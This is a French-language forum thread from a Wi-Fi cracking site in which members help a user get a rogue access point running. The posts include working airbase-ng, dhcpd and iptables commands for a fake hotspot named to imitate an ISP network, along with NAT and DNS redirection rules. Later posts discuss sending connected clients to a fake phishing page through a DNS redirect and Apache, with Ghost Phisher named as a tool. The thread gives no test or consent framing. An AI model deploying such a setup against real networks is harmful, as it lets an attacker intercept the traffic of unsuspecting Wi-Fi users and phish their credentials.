Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-12-2012 14:38:27

samoui2005
N00b
Inscription : 19-12-2012
Messages : 1

realisation rogue Ap

salut tous l monde g une petite question g reussi a mettre en place un rogue ap et il s'afiche bien dans mon scan wifi avec (airodump) mais le problem c'est que le PWR le signal est de 0 alor pas possible que les autre le voi sachant que j'utilise usb tp-link .
pour mettre un rogue ap il faut avoir un routeur et un recepter usb wifi ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 19-12-2012 20:12:34

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : realisation rogue Ap

Salut wink



1/ Bienvenu sur le forum et MERCI de te présenter s'il te plaît wink
2/ Screen (pour qu'on voit que tu as fait) (commandes ou screen de ta rogue)
3/ Language SMS à eviter
4/ Le mieux c'est deux cartes pour une rogue mais bon...
5/ Réponse de ma part une fois que le 1/, 2/, 3/ respectés


Sinon, bon courage wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#3 19-12-2012 20:43:53

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : realisation rogue Ap

Furyo a écrit :

Salut wink



1/ Bienvenu sur le forum et MERCI de te présenter s'il te plaît wink
2/ Screen (pour qu'on voit que tu as fait) (commandes ou screen de ta rogue)
3/ Language SMS à eviter
4/ Le mieux c'est deux cartes pour une rogue mais bon...
5/ Réponse de ma part une fois que le 1/, 2/, 3/ respectés


Sinon, bon courage wink

Je trouve ça un peu gros d’exiger autant de chose et pas forcement demander gentiment (ouais, sous forme de liste ça fais un peu "je te prend de haut") quand on est sois même un "nouveau" membre.


Sharkoff

Hors Ligne

#4 19-12-2012 21:19:19

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : realisation rogue Ap

C'est une réponse bien claire et stucturée, les smileys montrent une réelle volonté d'aider mais pas n'importe comment, il ne faut pas voir le mal partout Squaks wink

Hors Ligne

#5 19-12-2012 23:21:27

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : realisation rogue Ap

Apparemment j'ai mal interprété le message de Furyo, je m'en excuse roll


Sharkoff

Hors Ligne

#6 19-12-2012 23:41:14

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : realisation rogue Ap

No problemo smile

Hors Ligne

#7 23-01-2013 11:58:03

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Salut wink

Pour faire une rogue AP seul un ordinateur et une carte wifi compatible avec la suite aircrack-ng suffit.
-Quel est le modèle exact de ta carte ?
-Peut nous mettre une image sur le site avec airodump-ng ?

Hors Ligne

#8 25-02-2013 17:06:47

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Bonjour a tous, je me presente je suis "Patriote", j'ai deja pas mal lu les tutos du site mais je bloque sur le montage d'une Rogue Ap, quelqu un aurait til un tutorial car je rame.

Hors Ligne

#9 02-03-2013 04:53:16

Sulpice92
Membre Hyperactif
Inscription : 07-01-2013
Messages : 49

Re : realisation rogue Ap

Patriote a écrit :

Bonjour a tous, je me presente je suis "Patriote", j'ai deja pas mal lu les tutos du site mais je bloque sur le montage d'une Rogue Ap, quelqu un aurait til un tutorial car je rame.

http://exploit.co.il/hacking/set-fake-a … acktrack5/

C'est cadeau cool

Hors Ligne

#10 25-03-2013 12:23:49

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Merci sulpice, mais je bloque encore ...

j arrive a lancer mon fake "hospot" avec airbase.

je vois le fake ap dans ma liste disponible et quand je veux me connecter je n arrive pas a avoir d adresse ip, j ai essayer d éditer le dhcpd.conf mais en vain.

j'ai :

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}

avec ca et la commande : /etc/init.d/dhcp3-server start    >> mon serveur se lance, je sais qu il faut le configurer, ca ne me gene pas de reflechir mais la.... a l aide !

je ne vois pas quoi mettre dans subnet ect.. option routers...

j ai essayé avec plusieurs tuto, je suis dans l impasse...


Merci de votre aide:)

Hors Ligne

#11 25-03-2013 13:04:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Salut smile

Tu utilise quoi comme règle iptable? la configuration de ton dhcp est-elle la meme que iptable?

Dans ce cas la les première lignes d'iptable commence par:

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

Le dhcp est bon, ça vient d'iptable je pense, check bien tout ça wink

Hors Ligne

#12 25-03-2013 13:40:24

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Bon j arrive a me connecter avec l adresse ip 10.0.0.1

- et bien sur je n arrive pas a acceder a internet, alors qu elle est la suite pour l acces au net de mon client?

en fait j ai ca tiré d'un tuto :

echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 2;
echo "Killing DHCP..."
pkill dhcpd3
sleep 5;

echo "Putting Wlan In Monitor Mode..."
airmon-ng stop wlan0 # Change to your wlan interface
sleep 5;
airmon-ng start wlan0 # Change to your wlan interface
sleep 5;
echo "Starting Fake AP..."
airbase-ng -e Neuf_c2c -c 11 -v mon0 & #
sleep 5;

ifconfig at0 up
ifconfig at0 10.0.0.254 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254

sleep 5;

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth3 to your internet facing interface

je ne sais pas si c'est bon, ca me lance airbase et je lance un serveur manuellement (/etc/init.d/dhcp3-server start)

est ce la bonne technique?

Dernière modification par Patriote (25-03-2013 13:58:11)

Hors Ligne

#13 25-03-2013 22:26:14

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Pas étonnant que ça ne marche pas wink

Les règles iptable de ce script sont ajustées pour une rogue AP avec internet donc tu dois spécifier la source sur laquelle se trouve internet.

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth3 to your internet facing interface

Ton interface qui fournit le net doit etre eth0 dans ce cas la sinon tu dois la changer par eth1, eth2, eth3 etc.. selon ton interface.Autre chose, pour que ton client et accès a internet tu dois le rediriger sur le dns via l'interface qui fournit le net

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

Ensuite redémarre ton serveur dhcp et ça devrait marcher smile

Hors Ligne

#14 25-03-2013 22:43:31

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Voila ! merci koala de ton aide smile

Maintenant ca fonctionne nickel.

Hors Ligne

#15 26-03-2013 18:08:26

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : realisation rogue Ap

Koala, t'es sûr de ton coup pour la redirection obligatoire du DNS ? hmm
Moi j'en ai jamais eu besoin, si tu spécifies un DNS correct via la configuration du DHCP, ton client peut l'utiliser sans avoir besoin de rediriger quoi que ce soit...

A ma connaissance, seule la première ligne est obligatoire :

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Les 3 autres ne sont pas nécessaires, je pense :

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

(Accessoirement, rediriger tous les ports UDP vers la passerelle, c'est peut-être un peu excessif tongue)

Hors Ligne

#16 26-03-2013 19:12:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Coucou smile

En faite j'ai remarquer une petite rapidité de plus pendant que le client surf sur internet en étant sur la rogue, c'est pour ça que j'utilise ces lignes, mais tu as raison ce n'est pas obligatoire smile

Dernière modification par koala (26-03-2013 19:12:38)

Hors Ligne

#17 28-03-2013 16:17:47

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Salut !

Peut ton m'indiquer la démarche a suivre afin de rediriger mon client vers une 'fake page", j ai essayé de suivre pas mal de tuto mais aucun n explique, ce qu il faut mettre dans les dossiers d apache et comment mettre en place un "dns". smile

Enfin si j ai bien compris je dois mettre en place un dns qui redirigera les requetes vers un serveur Apache...??

ps: j ai essayé aussi avec ghost phisher. sad

Dernière modification par Patriote (28-03-2013 16:18:22)

Hors Ligne

#18 29-03-2013 11:09:45

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Salut wink

Il te suffit de rediriger le traffic sur le pc qui héberge ton serveur apache smile c'est encore une règle iptable a ajouter suivi d'un fichier dns.txt a remplir, sur ce site meme ça grouille d'exemple, je te laisse un peu chercher wink

Hors Ligne

#19 31-03-2013 15:27:58

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

salut;

Juste une derniere petite question qui m intrigue, dans cette regle iptable :

"iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1"

Pourquoi doit on mettre "192.168.1.1", car c est l ip d'administration de ma box, en fait je fais pas trop le rapprochement qui pourrait y avoir...

En fait moi j ai mis ceci, "iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1"

et le surf sur internet est vraiment aleatoire, ca bloque par intermittence.

Dernière modification par Patriote (31-03-2013 15:30:36)

Hors Ligne

#20 31-03-2013 20:23:39

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Si jamais tu es des lenteurs utilise seulement la règle avec eth0, les autres sont optionnels wink

Hors Ligne

#21 01-04-2013 08:16:19

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Le probleme est que je peut me connecter a ma "Rogue", je charge la page de "Google", parfois je sais aller jusque sur un site et apres blocage... hmm

Hors Ligne

#22 01-04-2013 12:26:46

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

C'est étrange, tu utilise bien la règle de redirection avec eth0? le forwading est-il bien activé sur ton système ?

echo 1 > /proc/sys/net/ipv4/ip_forward

Ça donne quoi quand tu fais un ping sur google par exemple?


Renvoi le résultat de la commande de :

arp -n -v -i at0

Hors Ligne

#23 01-04-2013 14:43:31

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Voici ce que arp -n -i ato me renvoit:

Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.130            ether   20:64:32:55:d6:f4   C                     at0
Entries: 2	Skipped: 1	Found: 1

En fait, je viens de remarquer que la connection fonctionnait en mettant dans dhcp.conf :

option domain-name-servers 8.8.8.8, 208.67.222.222;

Mais qu'au bout d un moment des que ca bloque, et je ne sais pas pourquoi mon client est deconnecté et impossible de se reconnecter, je relance le dhcpd3-server et la il me marque un beau "FAIL". hmm

Dernière modification par Patriote (01-04-2013 17:11:58)

Hors Ligne

#24 02-04-2013 12:24:33

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : realisation rogue Ap

Coucou? wink

Maintenant ca fonctionne nickel.

  Quel conf tu avais a ce moment la?

1- vérifis étape par étape tes règles iptables

2- assure toi que l'ip forward et bien activé

-3 Tu as essayer de mettre des open dns c'est pas bete mais sur quel type de box tu fais le test? (free,neuf,orange?...) car de mémoire quand j'étais chez free j'avais eu aussi beaucoup de mal a faire une rogue transparente avec internet.Si les open dns marchent pas essai de prendre celui de ton fournisseur d'accès et relance le tout avec wink

-4 donne le résultat des ping suivant de ton pc client:
google, pc attaquant, passerelle routeur

Hors Ligne

#25 03-04-2013 18:48:14

Patriote
Membre
Inscription : 25-02-2013
Messages : 20

Re : realisation rogue Ap

Salut !

Quel conf tu avais a ce moment la?

- la meme config sauf que je n avais pas essayer de naviguer au dela de 2 ou 3 pages.

- l ip forward est bien active.

-chez neuf

- J ai essaye en mode ap sur windows et la sa fonctionne  sans probleme...

Sur bactrack avec mon alfa j'arrive a creer ma rogue mais je n' arrive pas a me connecter dessus, mais quand j essaye avec une vielle cle (trendnet a 10 euros), j arrive a me connecter,  mais je peux surfer pas plus de 2 ou 3 pages apres j ai une sorte de blocage. . .


sad

Dernière modification par Patriote (03-04-2013 19:02:45)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2179 28-11-2016 19:42:10 par koala
35 1811 23-11-2016 16:31:33 par roofnat
16 1043 17-11-2016 12:22:00 par disquette
10 429 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 452 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.038 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]